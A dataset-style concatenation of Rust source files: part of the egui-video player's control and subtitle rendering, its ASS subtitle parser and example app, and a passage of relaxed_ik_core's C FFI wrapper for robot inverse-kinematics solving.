self.current_subtitles
.retain(|s| s.remaining_duration_ms > 0);
if let Some(mut queue) = self.subtitles_queue.try_lock() {
if queue.len() > 1 {
self.current_subtitles.push(queue.pop_front().unwrap());
}
}
}
state @ (PlayerState::SeekingInProgress | PlayerState::SeekingFinished) => {
if self.last_seek_ms.is_some() {
let last_seek_ms = *self.last_seek_ms.as_ref().unwrap();
if matches!(state, PlayerState::SeekingFinished) {
if let Some(previeous_player_state) = self.preseek_player_state {
self.set_state(previeous_player_state)
}
self.video_elapsed_ms_override = None;
self.last_seek_ms = None;
} else {
self.video_elapsed_ms_override = Some(last_seek_ms);
}
} else {
self.video_elapsed_ms_override = None;
}
}
PlayerState::Restarting => reset_stream = true,
_ => (),
}
if let Ok(message) = self.message_reciever.try_recv() {
match message {
PlayerMessage::StreamCycled(stream_type) => match stream_type {
Type::Audio => self.audio_stream_info.cycle(),
Type::Subtitle => {
self.current_subtitles.clear();
self.subtitle_stream_info.cycle();
}
_ => unreachable!(),
},
}
}
if reset_stream {
self.reset();
self.resume();
}
}
/// Create the [`egui::Image`] for the video frame.
pub fn generate_frame_image(&self, size: Vec2) -> Image {
Image::new(SizedTexture::new(self.texture_handle.id(), size)).sense(Sense::click())
}
/// Draw the video frame with a specific rect (without controls). Make sure to call [`Player::process_state`].
pub fn render_frame(&self, ui: &mut Ui, size: Vec2) -> Response {
ui.add(self.generate_frame_image(size))
}
/// Draw the video frame (without controls). Make sure to call [`Player::process_state`].
pub fn render_frame_at(&self, ui: &mut Ui, rect: Rect) -> Response {
ui.put(rect, self.generate_frame_image(rect.size()))
}
/// Draw the video frame and player controls and process state changes.
pub fn ui(&mut self, ui: &mut Ui, size: Vec2) -> egui::Response {
let frame_response = self.render_frame(ui, size);
self.render_controls(ui, &frame_response);
self.render_subtitles(ui, &frame_response);
self.process_state();
frame_response
}
/// Draw the video frame and player controls with a specific rect, and process state changes.
pub fn ui_at(&mut self, ui: &mut Ui, rect: Rect) -> egui::Response {
let frame_response = self.render_frame_at(ui, rect);
self.render_controls(ui, &frame_response);
self.render_subtitles(ui, &frame_response);
self.process_state();
frame_response
}
/// Draw the subtitles, if any. Only works when a subtitle streamer has been already created with
/// [`Player::add_subtitles`] or [`Player::with_subtitles`] and a valid subtitle stream exists.
pub fn render_subtitles(&mut self, ui: &mut Ui, frame_response: &Response) {
let original_rect_center_bottom = Pos2::new(self.size.x / 2., self.size.y);
let mut last_bottom = self.size.y;
for subtitle in self.current_subtitles.iter() {
let transform = RectTransform::from_to(
Rect::from_min_size(Pos2::ZERO, self.size),
frame_response.rect,
);
let text_rect = ui.painter().text(
subtitle
.position
.map(|p| transform.transform_pos(p))
.unwrap_or_else(|| {
//TODO incorporate left/right margin
let mut center_bottom = original_rect_center_bottom;
center_bottom.y = center_bottom.y.min(last_bottom) - subtitle.margin.bottom;
transform.transform_pos(center_bottom)
}),
subtitle.alignment,
&subtitle.text,
FontId::proportional(transform.transform_pos(Pos2::new(subtitle.font_size, 0.)).x),
subtitle.primary_fill,
);
last_bottom = transform.inverse().transform_pos(text_rect.center_top()).y;
}
}
/// Draw the player controls. Make sure to call [`Player::process_state()`]. Unless you are explicitly
/// drawing something in between the video frames and controls, it is probably better to use
/// [`Player::ui`] or [`Player::ui_at`].
pub fn render_controls(&mut self, ui: &mut Ui, frame_response: &Response) {
let hovered = ui.rect_contains_pointer(frame_response.rect);
let player_state = self.player_state.get();
let currently_seeking = matches!(
player_state,
PlayerState::SeekingInProgress | PlayerState::SeekingFinished
);
let is_stopped = matches!(player_state, PlayerState::Stopped);
let is_paused = matches!(player_state, PlayerState::Paused);
let animation_time = 0.2;
let seekbar_anim_frac = ui.ctx().animate_bool_with_time(
frame_response.id.with("seekbar_anim"),
hovered || currently_seeking || is_paused || is_stopped,
animation_time,
);
if seekbar_anim_frac <= 0. {
return;
}
let seekbar_width_offset = 20.;
let fullseekbar_width = frame_response.rect.width() - seekbar_width_offset;
let seekbar_width = fullseekbar_width * self.duration_frac();
let seekbar_offset = 20.;
let seekbar_pos =
frame_response.rect.left_bottom() + vec2(seekbar_width_offset / 2., -seekbar_offset);
let seekbar_height = 3.;
let mut fullseekbar_rect =
Rect::from_min_size(seekbar_pos, vec2(fullseekbar_width, seekbar_height));
let mut seekbar_rect =
Rect::from_min_size(seekbar_pos, vec2(seekbar_width, seekbar_height));
let seekbar_interact_rect = fullseekbar_rect.expand(10.);
let seekbar_response = ui.interact(
seekbar_interact_rect,
frame_response.id.with("seekbar"),
Sense::click_and_drag(),
);
let seekbar_hovered = seekbar_response.hovered();
let seekbar_hover_anim_frac = ui.ctx().animate_bool_with_time(
frame_response.id.with("seekbar_hover_anim"),
seekbar_hovered || currently_seeking,
animation_time,
);
if seekbar_hover_anim_frac > 0. {
let new_top = fullseekbar_rect.top() - (3. * seekbar_hover_anim_frac);
fullseekbar_rect.set_top(new_top);
seekbar_rect.set_top(new_top);
}
let seek_indicator_anim = ui.ctx().animate_bool_with_time(
frame_response.id.with("seek_indicator_anim"),
currently_seeking,
animation_time,
);
if currently_seeking {
let seek_indicator_shadow = Shadow {
offset: vec2(10.0, 20.0),
blur: 15.0,
spread: 0.0,
color: Color32::from_black_alpha(96).linear_multiply(seek_indicator_anim),
};
let spinner_size = 20. * seek_indicator_anim;
ui.painter()
.add(seek_indicator_shadow.as_shape(frame_response.rect, Rounding::ZERO));
ui.put(
Rect::from_center_size(frame_response.rect.center(), Vec2::splat(spinner_size)),
Spinner::new().size(spinner_size),
);
}
if seekbar_hovered || currently_seeking {
if let Some(hover_pos) = seekbar_response.hover_pos() {
if seekbar_response.clicked() || seekbar_response.dragged() {
let seek_frac = ((hover_pos - frame_response.rect.left_top()).x
- seekbar_width_offset / 2.)
.max(0.)
.min(fullseekbar_width)
/ fullseekbar_width;
seekbar_rect.set_right(
hover_pos
.x
.min(fullseekbar_rect.right())
.max(fullseekbar_rect.left()),
);
if is_stopped {
self.start()
}
self.seek(seek_frac);
}
}
}
let text_color = Color32::WHITE.linear_multiply(seekbar_anim_frac);
let pause_icon = if is_paused {
"▶"
} else if is_stopped {
"◼"
} else if currently_seeking {
"↔"
} else {
"⏸"
};
let audio_volume_frac = self.options.audio_volume.get() / self.options.max_audio_volume;
let sound_icon = if audio_volume_frac > 0.7 {
"🔊"
} else if audio_volume_frac > 0.4 {
"🔉"
} else if audio_volume_frac > 0. {
"🔈"
} else {
"🔇"
};
let icon_font_id = FontId {
size: 16.,
..Default::default()
};
let subtitle_icon = "💬";
let stream_icon = "🔁";
let icon_margin = 5.;
let text_y_offset = -7.;
let sound_icon_offset = vec2(-5., text_y_offset);
let sound_icon_pos = fullseekbar_rect.right_top() + sound_icon_offset;
let stream_index_icon_offset = vec2(-30., text_y_offset + 1.);
let stream_icon_pos = fullseekbar_rect.right_top() + stream_index_icon_offset;
let contraster_alpha: u8 = 100;
let pause_icon_offset = vec2(3., text_y_offset);
let pause_icon_pos = fullseekbar_rect.left_top() + pause_icon_offset;
let duration_text_offset = vec2(25., text_y_offset);
let duration_text_pos = fullseekbar_rect.left_top() + duration_text_offset;
let duration_text_font_id = FontId {
size: 14.,
..Default::default()
};
let shadow = Shadow {
offset: vec2(10.0, 20.0),
blur: 15.0,
spread: 0.0,
color: Color32::from_black_alpha(25).linear_multiply(seekbar_anim_frac),
};
let mut shadow_rect = frame_response.rect;
shadow_rect.set_top(shadow_rect.bottom() - seekbar_offset - 10.);
let fullseekbar_color = Color32::GRAY.linear_multiply(seekbar_anim_frac);
let seekbar_color = Color32::WHITE.linear_multiply(seekbar_anim_frac);
ui.painter()
.add(shadow.as_shape(shadow_rect, Rounding::ZERO));
ui.painter().rect_filled(
fullseekbar_rect,
Rounding::ZERO,
fullseekbar_color.linear_multiply(0.5),
);
ui.painter()
.rect_filled(seekbar_rect, Rounding::ZERO, seekbar_color);
ui.painter().text(
pause_icon_pos,
Align2::LEFT_BOTTOM,
pause_icon,
icon_font_id.clone(),
text_color,
);
ui.painter().text(
duration_text_pos,
Align2::LEFT_BOTTOM,
self.duration_text(),
duration_text_font_id,
text_color,
);
if seekbar_hover_anim_frac > 0. {
ui.painter().circle_filled(
seekbar_rect.right_center(),
7. * seekbar_hover_anim_frac,
seekbar_color,
);
}
if frame_response.clicked() {
let mut reset_stream = false;
let mut start_stream = false;
match self.player_state.get() {
PlayerState::Stopped => start_stream = true,
PlayerState::EndOfFile => reset_stream = true,
PlayerState::Paused => self.player_state.set(PlayerState::Playing),
PlayerState::Playing => self.player_state.set(PlayerState::Paused),
_ => (),
}
if reset_stream {
self.reset();
self.resume();
} else if start_stream {
self.start();
}
}
let is_audio_cyclable = self.audio_stream_info.is_cyclable();
let is_subtitle_cyclable = self.audio_stream_info.is_cyclable();
if is_audio_cyclable || is_subtitle_cyclable {
let stream_icon_rect = ui.painter().text(
stream_icon_pos,
Align2::RIGHT_BOTTOM,
stream_icon,
icon_font_id.clone(),
text_color,
);
let stream_icon_hovered = ui.rect_contains_pointer(stream_icon_rect);
let mut stream_info_hovered = false;
let mut cursor = stream_icon_rect.right_top() + vec2(0., 5.);
let cursor_offset = vec2(3., 15.);
let stream_anim_id = frame_response.id.with("stream_anim");
let mut stream_anim_frac: f32 = ui
.ctx()
.memory_mut(|m| *m.data.get_temp_mut_or_default(stream_anim_id));
let mut draw_row = |stream_type: Type| {
let text = match stream_type {
Type::Audio => format!("{} {}", sound_icon, self.audio_stream_info),
Type::Subtitle => format!("{} {}", subtitle_icon, self.subtitle_stream_info),
_ => unreachable!(),
};
let text_position = cursor - cursor_offset;
let text_galley =
ui.painter()
.layout_no_wrap(text.clone(), icon_font_id.clone(), text_color);
let background_rect =
Rect::from_min_max(text_position - text_galley.size(), text_position)
.expand(5.);
let background_color =
Color32::from_black_alpha(contraster_alpha).linear_multiply(stream_anim_frac);
ui.painter()
.rect_filled(background_rect, Rounding::same(5.), background_color);
if ui.rect_contains_pointer(background_rect.expand(5.)) {
stream_info_hovered = true;
}
if ui
.interact(
background_rect,
frame_response.id.with(&text),
Sense::click(),
)
.clicked()
{
match stream_type {
Type::Audio => self.cycle_audio_stream(),
Type::Subtitle => self.cycle_subtitle_stream(),
_ => unreachable!(),
};
};
let text_rect = ui.painter().text(
text_position,
Align2::RIGHT_BOTTOM,
text,
icon_font_id.clone(),
text_color.linear_multiply(stream_anim_frac),
);
cursor.y = text_rect.top();
};
if stream_anim_frac > 0. {
if is_audio_cyclable {
draw_row(Type::Audio);
}
if is_subtitle_cyclable {
draw_row(Type::Subtitle);
}
}
stream_anim_frac = ui.ctx().animate_bool_with_time(
stream_anim_id,
stream_icon_hovered || (stream_info_hovered && stream_anim_frac > 0.),
animation_time,
);
ui.ctx()
.memory_mut(|m| m.data.insert_temp(stream_anim_id, stream_anim_frac));
}
if self.audio_streamer.is_some() {
let sound_icon_rect = ui.painter().text(
sound_icon_pos,
Align2::RIGHT_BOTTOM,
sound_icon,
icon_font_id.clone(),
text_color,
);
if ui
.interact(
sound_icon_rect,
| rust | MIT | 68933f42b45220af92221fb82315b03c87e7efce | 2026-01-04T20:23:24.044000Z | true |
n00kii/egui-video | https://github.com/n00kii/egui-video/blob/68933f42b45220af92221fb82315b03c87e7efce/src/subtitle/ass.rs | src/subtitle/ass.rs | use anyhow::{anyhow, bail, Context, Result};
use egui::{Align2, Color32, Pos2};
use nom::branch::alt;
use nom::bytes::complete::{is_not, tag, take_till, take_until, take_while_m_n};
use nom::character::complete::{char, digit0, digit1};
use nom::combinator::{map, map_res, opt, rest};
use nom::error::context;
use nom::multi::{many0, separated_list0};
use nom::number::complete::double;
use nom::sequence::{delimited, pair, preceded, tuple};
use nom::{AsChar, IResult};
use super::{FadeEffect, Subtitle, SubtitleField};
fn num_list(i: &str) -> IResult<&str, Vec<f64>> {
delimited(char('('), separated_list0(char(','), double), char(')'))(i)
}
fn tuple_int_2(v: Vec<f64>) -> Result<(i64, i64)> {
tuple_float_2(v).map(|v| (v.0 as i64, v.1 as i64))
}
fn tuple_float_2(v: Vec<f64>) -> Result<(f64, f64)> {
const FAIL_TEXT: &str = "invalid number of items";
Ok((*v.first().context(FAIL_TEXT)?, *v.get(1).context(FAIL_TEXT)?))
}
fn fad(i: &str) -> IResult<&str, SubtitleField> {
preceded(
tag(r"\fad"),
map(map_res(num_list, tuple_int_2), |f| {
let fade_effect = SubtitleField::Fade(FadeEffect {
_fade_in_ms: f.0,
_fade_out_ms: f.1,
});
fade_effect
}),
)(i)
}
fn t(i: &str) -> IResult<&str, SubtitleField> {
preceded(
tag(r"\t"),
delimited(
char('('),
map(take_until(")"), |_| {
SubtitleField::Undefined("transition not implemented")
}),
char(')'),
),
)(i)
}
fn an(i: &str) -> IResult<&str, SubtitleField> {
preceded(
tag(r"\an"),
map_res(digit1, |s: &str| match s.parse::<i64>() {
Ok(1) => Ok(SubtitleField::Alignment(Align2::LEFT_BOTTOM)),
Ok(2) => Ok(SubtitleField::Alignment(Align2::CENTER_BOTTOM)),
Ok(3) => Ok(SubtitleField::Alignment(Align2::RIGHT_BOTTOM)),
Ok(4) => Ok(SubtitleField::Alignment(Align2::LEFT_CENTER)),
Ok(5) => Ok(SubtitleField::Alignment(Align2::CENTER_CENTER)),
Ok(6) => Ok(SubtitleField::Alignment(Align2::RIGHT_CENTER)),
Ok(7) => Ok(SubtitleField::Alignment(Align2::LEFT_TOP)),
Ok(8) => Ok(SubtitleField::Alignment(Align2::CENTER_TOP)),
Ok(9) => Ok(SubtitleField::Alignment(Align2::RIGHT_TOP)),
_ => bail!("invalid alignment"),
}),
)(i)
}
fn pos(i: &str) -> IResult<&str, SubtitleField> {
preceded(
tag(r"\pos"),
map(map_res(num_list, tuple_float_2), |p| {
SubtitleField::Position(Pos2::new(p.0 as f32, p.1 as f32))
}),
)(i)
}
// color parsing credit: example on https://github.com/rust-bakery/nom/tree/main
fn from_hex(i: &str) -> Result<u8> {
Ok(u8::from_str_radix(i, 16)?)
}
fn hex_primary(i: &str) -> IResult<&str, u8> {
map_res(take_while_m_n(2, 2, |c: char| c.is_hex_digit()), from_hex)(i)
}
fn hex_to_color32(i: &str) -> IResult<&str, Color32> {
let (i, (blue, green, red)) = tuple((hex_primary, hex_primary, hex_primary))(i)?;
Ok((i, Color32::from_rgb(red, green, blue)))
}
fn c(i: &str) -> IResult<&str, SubtitleField> {
delimited(
alt((tag(r"\c&H"), tag(r"\1c&H"))),
map(hex_to_color32, SubtitleField::PrimaryFill),
tag("&"),
)(i)
}
fn undefined(i: &str) -> IResult<&str, SubtitleField> {
map(
preceded(char('\\'), take_till(|c| "}\\".contains(c))),
SubtitleField::Undefined,
)(i)
}
fn parse_style(i: &str) -> IResult<&str, Subtitle> {
let (i, subtitle_style_components) = delimited(
char('{'),
many0(alt((t, fad, an, pos, c, undefined))),
tuple((take_until("}"), char('}'))),
)(i)?;
let mut subtitle = Subtitle::default();
for component in subtitle_style_components {
match component {
SubtitleField::Fade(fade) => subtitle.fade = fade,
SubtitleField::Alignment(alignment) => subtitle.alignment = alignment,
SubtitleField::PrimaryFill(primary_fill) => subtitle.primary_fill = primary_fill,
SubtitleField::Position(position) => subtitle.position = Some(position),
SubtitleField::Undefined(_) => (),
}
}
Ok((i, subtitle))
}
fn text_field(i: &str) -> IResult<&str, Subtitle> {
let (i, (subtitle, subtitle_text)) = preceded(opt_comma, pair(opt(parse_style), rest))(i)?;
let mut subtitle = subtitle.unwrap_or_default();
subtitle.text = subtitle_text.replace(r"\N", "\n");
Ok((i, subtitle))
}
fn not_comma(i: &str) -> IResult<&str, &str> {
is_not(",")(i)
}
fn comma(i: &str) -> IResult<&str, char> {
char(',')(i)
}
fn opt_comma(i: &str) -> IResult<&str, Option<char>> {
opt(comma)(i)
}
fn string_field(i: &str) -> IResult<&str, Option<String>> {
preceded(
opt_comma,
map(opt(not_comma), |s| s.map(String::from)),
)(i)
}
fn num_field(i: &str) -> IResult<&str, i32> {
preceded(opt_comma, map_res(digit0, str::parse))(i)
}
pub(crate) fn parse_ass_subtitle(i: &str) -> Result<Subtitle> {
let (_i, (_layer, _start, _style, _name, _margin_l, _margin_r, _margin_v, _effect, subtitle)) =
tuple((
context("layer", num_field),
context("start", num_field),
context("style", string_field),
context("name", string_field),
context("margin_l", num_field),
context("margin_r", num_field),
context("margin_v", num_field),
context("effect", string_field),
context("style override + text", text_field),
))(i)
.map_err(|e| anyhow!(format!("subtitle parse failed: {e}")))?;
Ok(subtitle)
}
| rust | MIT | 68933f42b45220af92221fb82315b03c87e7efce | 2026-01-04T20:23:24.044000Z | false |
n00kii/egui-video | https://github.com/n00kii/egui-video/blob/68933f42b45220af92221fb82315b03c87e7efce/src/subtitle/mod.rs | src/subtitle/mod.rs | use anyhow::Result;
use egui::{Align2, Color32, Margin, Pos2};
use self::ass::parse_ass_subtitle;
mod ass;
#[derive(Debug)]
pub struct Subtitle {
pub text: String,
pub fade: FadeEffect,
pub alignment: Align2,
pub primary_fill: Color32,
pub position: Option<Pos2>,
pub font_size: f32,
pub margin: Margin,
pub remaining_duration_ms: i64,
}
// todo, among others
// struct Transition<'a> {
// offset_start_ms: i64,
// offset_end_ms: i64,
// accel: f64,
// field: SubtitleField<'a>,
// }
enum SubtitleField<'a> {
Fade(FadeEffect),
Alignment(Align2),
PrimaryFill(Color32),
Position(Pos2),
#[allow(unused)]
Undefined(&'a str),
}
#[derive(Debug, Default)]
pub struct FadeEffect {
_fade_in_ms: i64,
_fade_out_ms: i64,
}
impl Default for Subtitle {
fn default() -> Self {
Self {
text: String::new(),
fade: FadeEffect {
_fade_in_ms: 0,
_fade_out_ms: 0,
},
remaining_duration_ms: 0,
font_size: 30.,
margin: Margin::same(85.),
alignment: Align2::CENTER_CENTER,
primary_fill: Color32::WHITE,
position: None,
}
}
}
impl Subtitle {
fn from_text(text: &str) -> Self {
Subtitle::default().with_text(text)
}
pub(crate) fn with_text(mut self, text: &str) -> Self {
self.text = String::from(text);
self
}
pub(crate) fn with_duration_ms(mut self, duration_ms: i64) -> Self {
self.remaining_duration_ms = duration_ms;
self
}
pub(crate) fn from_ffmpeg_rect(rect: ffmpeg::subtitle::Rect) -> Result<Self> {
match rect {
ffmpeg::subtitle::Rect::Ass(ass) => parse_ass_subtitle(ass.get()),
ffmpeg::subtitle::Rect::Bitmap(_bitmap) => {
Ok(Subtitle::from_text("[ unsupported bitmap subtitle ]").with_duration_ms(500))
}
ffmpeg::subtitle::Rect::None(_none) => anyhow::bail!("no subtitle"),
ffmpeg::subtitle::Rect::Text(text) => Ok(Subtitle::from_text(text.get())),
}
}
}
impl FadeEffect {
fn _is_zero(&self) -> bool {
self._fade_in_ms == 0 && self._fade_out_ms == 0
}
}
| rust | MIT | 68933f42b45220af92221fb82315b03c87e7efce | 2026-01-04T20:23:24.044000Z | false |
n00kii/egui-video | https://github.com/n00kii/egui-video/blob/68933f42b45220af92221fb82315b03c87e7efce/examples/main.rs | examples/main.rs | use eframe::NativeOptions;
use egui::{CentralPanel, DragValue, Grid, Sense, Slider, TextEdit, Window};
use egui_video::{AudioDevice, Player};
fn main() {
let _ = eframe::run_native(
"app",
NativeOptions::default(),
Box::new(|_| Ok(Box::new(App::default()))),
);
}
struct App {
audio_device: AudioDevice,
player: Option<Player>,
media_path: String,
stream_size_scale: f32,
seek_frac: f32,
}
impl Default for App {
fn default() -> Self {
Self {
audio_device: AudioDevice::new().unwrap(),
media_path: String::new(),
stream_size_scale: 1.,
seek_frac: 0.,
player: None,
}
}
}
impl eframe::App for App {
fn update(&mut self, ctx: &egui::Context, _frame: &mut eframe::Frame) {
ctx.request_repaint();
CentralPanel::default().show(ctx, |ui| {
ui.horizontal(|ui| {
ui.add_enabled_ui(!self.media_path.is_empty(), |ui| {
if ui.button("load").clicked() {
match Player::new(ctx, &self.media_path.replace("\"", "")).and_then(|p| {
p.with_audio(&mut self.audio_device)
.and_then(|p| p.with_subtitles())
}) {
Ok(player) => {
self.player = Some(player);
}
Err(e) => println!("failed to make stream: {e}"),
}
}
});
ui.add_enabled_ui(!self.media_path.is_empty(), |ui| {
if ui.button("clear").clicked() {
self.player = None;
}
});
let tedit_resp = ui.add_sized(
[ui.available_width(), ui.available_height()],
TextEdit::singleline(&mut self.media_path)
.hint_text("click to set path")
.interactive(false),
);
if ui
.interact(
tedit_resp.rect,
tedit_resp.id.with("click_sense"),
Sense::click(),
)
.clicked()
{
if let Some(path_buf) = rfd::FileDialog::new()
.add_filter("videos", &["mp4", "gif", "webm", "mkv", "ogg"])
.pick_file()
{
self.media_path = path_buf.as_path().to_string_lossy().to_string();
}
}
});
ui.separator();
if let Some(player) = self.player.as_mut() {
Window::new("info").show(ctx, |ui| {
Grid::new("info_grid").show(ui, |ui| {
ui.label("frame rate");
ui.label(player.framerate.to_string());
ui.end_row();
ui.label("size");
ui.label(format!("{}x{}", player.size.x, player.size.y));
ui.end_row();
ui.label("elapsed / duration");
ui.label(player.duration_text());
ui.end_row();
ui.label("state");
ui.label(format!("{:?}", player.player_state.get()));
ui.end_row();
ui.label("has audio?");
ui.label(player.audio_streamer.is_some().to_string());
ui.end_row();
ui.label("has subtitles?");
ui.label(player.subtitle_streamer.is_some().to_string());
ui.end_row();
});
});
Window::new("controls").show(ctx, |ui| {
ui.horizontal(|ui| {
if ui.button("seek to:").clicked() {
player.seek(self.seek_frac);
}
ui.add(
DragValue::new(&mut self.seek_frac)
.speed(0.05)
.range(0.0..=1.0),
);
ui.checkbox(&mut player.options.looping, "loop");
});
ui.horizontal(|ui| {
ui.label("size scale");
ui.add(Slider::new(&mut self.stream_size_scale, 0.0..=2.));
});
ui.separator();
ui.horizontal(|ui| {
if ui.button("play").clicked() {
player.start()
}
if ui.button("unpause").clicked() {
player.resume();
}
if ui.button("pause").clicked() {
player.pause();
}
if ui.button("stop").clicked() {
player.stop();
}
});
ui.horizontal(|ui| {
ui.label("volume");
let mut volume = player.options.audio_volume.get();
if ui
.add(Slider::new(
&mut volume,
0.0..=player.options.max_audio_volume,
))
.changed()
{
player.options.audio_volume.set(volume);
};
});
});
player.ui(ui, player.size * self.stream_size_scale);
}
});
}
}
| rust | MIT | 68933f42b45220af92221fb82315b03c87e7efce | 2026-01-04T20:23:24.044000Z | false |
uwgraphics/relaxed_ik_core | https://github.com/uwgraphics/relaxed_ik_core/blob/1c48d2ae408b4e024ee037641aac1e728267984e/src/relaxed_ik_wrapper.rs | src/relaxed_ik_wrapper.rs | use crate::relaxed_ik::{RelaxedIK, Opt};
use std::sync::{Arc, Mutex};
use nalgebra::{Vector3, Vector6, UnitQuaternion, Quaternion,Translation3, Isometry3};
use std::os::raw::{*};
use std::str;
use crate::utils_rust::file_utils::{*};
// http://jakegoulding.com/rust-ffi-omnibus/objects/
#[no_mangle]
pub unsafe extern "C" fn relaxed_ik_new(path_to_setting: *const c_char) -> *mut RelaxedIK {
if path_to_setting.is_null()
{
let path_to_src = get_path_to_src();
let default_path_to_setting = path_to_src + "configs/settings.yaml";
return Box::into_raw(Box::new(RelaxedIK::load_settings(default_path_to_setting.as_str())))
}
let c_str = std::ffi::CStr::from_ptr(path_to_setting);
let path_to_setting_str = c_str.to_str().expect("Not a valid UTF-8 string");
Box::into_raw(Box::new(RelaxedIK::load_settings(path_to_setting_str)))
}
#[no_mangle]
pub unsafe extern "C" fn relaxed_ik_free(ptr: *mut RelaxedIK) {
if ptr.is_null() { return }
Box::from_raw(ptr);
}
#[no_mangle]
pub unsafe extern "C" fn reset(ptr: *mut RelaxedIK, joint_state: *const c_double, joint_state_length: c_int) {
let relaxed_ik = unsafe {
assert!(!ptr.is_null());
&mut *ptr
};
let x_slice: &[c_double] = std::slice::from_raw_parts(joint_state, joint_state_length as usize);
let x_vec = x_slice.to_vec();
relaxed_ik.reset(x_vec);
}
#[no_mangle]
pub unsafe extern "C" fn solve_position(ptr: *mut RelaxedIK, pos_goals: *const c_double, pos_length: c_int,
quat_goals: *const c_double, quat_length: c_int,
tolerance: *const c_double, tolerance_length: c_int) -> Opt {
let relaxed_ik = unsafe {
assert!(!ptr.is_null());
&mut *ptr
};
assert!(!pos_goals.is_null(), "Null pointer for pos goals!");
assert!(!quat_goals.is_null(), "Null pointer for quat goals!");
assert!(!tolerance.is_null(), "Null pointer for tolerance!");
assert!(pos_length as usize == relaxed_ik.vars.robot.num_chains * 3 ,
"Pos vels are expected to have {} numbers, but got {}",
relaxed_ik.vars.robot.num_chains * 3, pos_length);
assert!(quat_length as usize == relaxed_ik.vars.robot.num_chains * 4,
"Rot vels are expected to have {} numbers, but got {}",
relaxed_ik.vars.robot.num_chains * 4, quat_length);
assert!(tolerance_length as usize == relaxed_ik.vars.robot.num_chains * 6,
"Tolerance are expected to have {} numbers, but got {}",
relaxed_ik.vars.robot.num_chains * 6, tolerance_length);
let pos_slice: &[c_double] = std::slice::from_raw_parts(pos_goals, pos_length as usize);
let quat_slice: &[c_double] = std::slice::from_raw_parts(quat_goals, quat_length as usize);
let tolerance_slice: &[c_double] = std::slice::from_raw_parts(tolerance, tolerance_length as usize);
let pos_vec = pos_slice.to_vec();
let quat_vec = quat_slice.to_vec();
let tolerance_vec = tolerance_slice.to_vec();
let ja = solve_position_helper(relaxed_ik, pos_vec, quat_vec, tolerance_vec);
let ptr = ja.as_ptr();
let len = ja.len();
std::mem::forget(ja);
Opt {data: ptr, length: len as c_int}
}
#[no_mangle]
pub unsafe extern "C" fn solve_velocity(ptr: *mut RelaxedIK, pos_vels: *const c_double, pos_length: c_int,
rot_vels: *const c_double, rot_length: c_int,
tolerance: *const c_double, tolerance_length: c_int) -> Opt {
let relaxed_ik = unsafe {
assert!(!ptr.is_null());
&mut *ptr
};
assert!(!pos_vels.is_null(), "Null pointer for pos vels!");
assert!(!rot_vels.is_null(), "Null pointer for rot vels!");
assert!(!tolerance.is_null(), "Null pointer for tolerance!");
assert!(pos_length as usize == relaxed_ik.vars.robot.num_chains * 3 ,
"Pos vels are expected to have {} numbers, but got {}",
relaxed_ik.vars.robot.num_chains * 3, pos_length);
assert!(rot_length as usize == relaxed_ik.vars.robot.num_chains * 3,
"Rot vels are expected to have {} numbers, but got {}",
relaxed_ik.vars.robot.num_chains * 3, rot_length);
assert!(tolerance_length as usize == relaxed_ik.vars.robot.num_chains * 6,
"Tolerance are expected to have {} numbers, but got {}",
relaxed_ik.vars.robot.num_chains * 6, tolerance_length);
let pos_slice: &[c_double] = std::slice::from_raw_parts(pos_vels, pos_length as usize);
let rot_slice: &[c_double] = std::slice::from_raw_parts(rot_vels, rot_length as usize);
let tolerance_slice: &[c_double] = std::slice::from_raw_parts(tolerance, tolerance_length as usize);
let pos_vec = pos_slice.to_vec();
let rot_vec = rot_slice.to_vec();
let tolerance_vec = tolerance_slice.to_vec();
let ja = solve_velocity_helper(relaxed_ik, pos_vec, rot_vec, tolerance_vec);
let ptr = ja.as_ptr();
let len = ja.len();
std::mem::forget(ja);
Opt {data: ptr, length: len as c_int}
}
#[no_mangle]
pub unsafe extern "C" fn get_ee_positions(ptr: *mut RelaxedIK) -> Opt {
let relaxed_ik = unsafe {
assert!(!ptr.is_null());
&mut *ptr
};
let mut positions = Vec::new();
for i in 0..relaxed_ik.vars.goal_positions.len() {
positions.push(relaxed_ik.vars.goal_positions[i].x);
positions.push(relaxed_ik.vars.goal_positions[i].y);
positions.push(relaxed_ik.vars.goal_positions[i].z);
}
let ptr = positions.as_ptr();
let len = positions.len();
std::mem::forget(positions);
Opt {data: ptr, length: len as c_int}
}
// This is mainly for backward compatibility
#[no_mangle]
pub unsafe extern "C" fn solve(ptr: *mut RelaxedIK, pos_goals: *const c_double, pos_length: c_int,
quat_goals: *const c_double, quat_length: c_int,
tolerance: *const c_double, tolerance_length: c_int) -> Opt {
let relaxed_ik = unsafe {
assert!(!ptr.is_null());
&mut *ptr
};
assert!(!pos_goals.is_null(), "Null pointer for pos goals!");
assert!(!quat_goals.is_null(), "Null pointer for quat goals!");
assert!(!tolerance.is_null(), "Null pointer for tolerance!");
let pos_slice: &[c_double] = std::slice::from_raw_parts(pos_goals, pos_length as usize);
let quat_slice: &[c_double] = std::slice::from_raw_parts(quat_goals, quat_length as usize);
let tolerance_slice: &[c_double] = std::slice::from_raw_parts(tolerance, tolerance_length as usize);
let pos_vec = pos_slice.to_vec();
let quat_vec = quat_slice.to_vec();
let tolerance_vec = tolerance_slice.to_vec();
let ja = solve_position_helper(relaxed_ik, pos_vec, quat_vec, tolerance_vec);
let ptr = ja.as_ptr();
let len = ja.len();
std::mem::forget(ja);
Opt {data: ptr, length: len as c_int}
}
fn solve_position_helper(relaxed_ik: &mut RelaxedIK, pos_goals: Vec<f64>, quat_goals: Vec<f64>,
tolerance: Vec<f64>) -> Vec<f64> {
for i in 0..relaxed_ik.vars.robot.num_chains {
relaxed_ik.vars.goal_positions[i] = Vector3::new(pos_goals[3*i], pos_goals[3*i+1], pos_goals[3*i+2]);
let tmp_q = Quaternion::new(quat_goals[4*i+3], quat_goals[4*i], quat_goals[4*i+1], quat_goals[4*i+2]);
relaxed_ik.vars.goal_quats[i] = UnitQuaternion::from_quaternion(tmp_q);
relaxed_ik.vars.tolerances[i] = Vector6::new( tolerance[6*i], tolerance[6*i+1], tolerance[6*i+2],
tolerance[6*i+3], tolerance[6*i+4], tolerance[6*i+5])
}
let x = relaxed_ik.solve();
return x;
}
fn solve_velocity_helper(relaxed_ik: &mut RelaxedIK, pos_vels: Vec<f64>, rot_vels: Vec<f64>,
tolerance: Vec<f64>) -> Vec<f64> {
for i in 0..relaxed_ik.vars.robot.num_chains {
relaxed_ik.vars.goal_positions[i] += Vector3::new(pos_vels[3*i], pos_vels[3*i+1], pos_vels[3*i+2]);
let axisangle = Vector3::new(rot_vels[3*i], rot_vels[3*i+1], rot_vels[3*i+2]);
